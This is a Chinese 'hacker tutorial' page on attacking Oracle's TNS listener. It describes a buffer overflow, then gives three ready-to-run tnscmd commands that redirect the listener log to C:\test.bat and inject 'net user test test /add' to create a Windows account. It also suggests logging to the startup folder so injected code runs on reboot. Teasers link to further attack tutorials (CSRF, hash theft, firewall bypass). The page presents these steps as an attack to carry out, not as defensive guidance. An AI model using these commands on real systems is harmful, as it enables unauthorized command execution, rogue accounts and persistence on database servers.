建站极客  
                        网络安全                          黑客教程                          正文 
                     
                 
                
                    针对Oracle的TNS listener的攻击方法                 
                
                    所属分类:
                        网络安全  / 黑客教程                      
                    阅读数:
                        142 
                    
                        
                                 
                             收藏 0
                                 
                             赞 0
                                 
                             分享 
                    
                 
                
                    首先,根据版本的不同,TNS listener可能较易受到多种类型的缓冲区溢出攻击,这些攻击可以在不提供用户ID和口令的情况下被利用。例如:在oracle 9i中,当客户机请求某个过长的service_name时,很容易受到溢出攻击。当listener为日志构建错误消息之后,service_name的值会被复制到某于栈结构的缓冲区内,从而引起溢出—覆盖保存值将返回栈中的地址。这种做法可以使攻击者获得控制权。事实上,TNS listener曾经有过多次溢出和格式化字符串的漏洞。
 
 其次,另一类攻击和日志文件有关。只有当未给listener设置口令的时候,攻击才会有效。假设某个listener没有设置口令,攻击方法如下:
 
  tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:\\)))”  将日志目录设置到C盘
 
  tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat)))”  将日志文件设置为test.bat
 
  tnscmd -h www.example.com –rawcmd “(CONNECT_DATA=((     ||dir >test.txt||net user test test /add))”  该命令把dir >test.txt、net user test test /add命令写入c:\test.bat文件,由于双竖线的作用(第一条命令执行失败后,WINDOWS命令解释器执行后面的命令)把错误的信息注释掉, 从而可以执行我们提交的命令。
 
 通过设置日志文件到不同的目录,例如WINDOWS的启动目录,当服务器重启将执行恶意用户提交的特定代码,从而对系统造成威胁。
 
 运行于UNIX系统上的oracle也会受到同样的威胁。其中一种方法就是将“  ”回送给.rhost文件,当系统运行时,使用r*services命令。
 
 
                                     
             
            
                
                CSRF的攻击方式详解 黑客必备知识 CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
抓取管理员hash值(哈希)的另类方法 哈希算法将任意长度的二进制值映射为固定长度的较小二进制值,这个小的二进制值称为哈希值。哈希值是一段数据唯一且极其紧凑的数值表示形式。如果散列一段明文而且哪怕只更改该段落的一个字母,随后的哈希都将产生不同的值。要找到散列为同一个值的两个不同的输入,在计
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
网站安全教程 绕过D盾进行注入的方法(图文教程) D盾_IIS防火墙专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计! 限制了常见的入侵方法,让服务器更安全!
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
局域网安全教程 HSRP攻击和防范的方法介绍(图文教程) 热备份路由器协议(HSRP)的设计目标是支持特定情况下 IP 流量失败转移不会引起混乱、并允许主机使用单路由器,以及即使在实际第一跳路由器使用失败的情形下仍能维护路由器间的连通性。换句话说,当源主机不能动态知道第一跳路由器的 IP 地址时,HSRP 协议能够保护第一
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
SQL通用防注入系统asp版漏洞 今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。
                    评论 0 
                    
                         
                     收藏 0
                         
                     赞 0
                         
                     分享
                 查看更多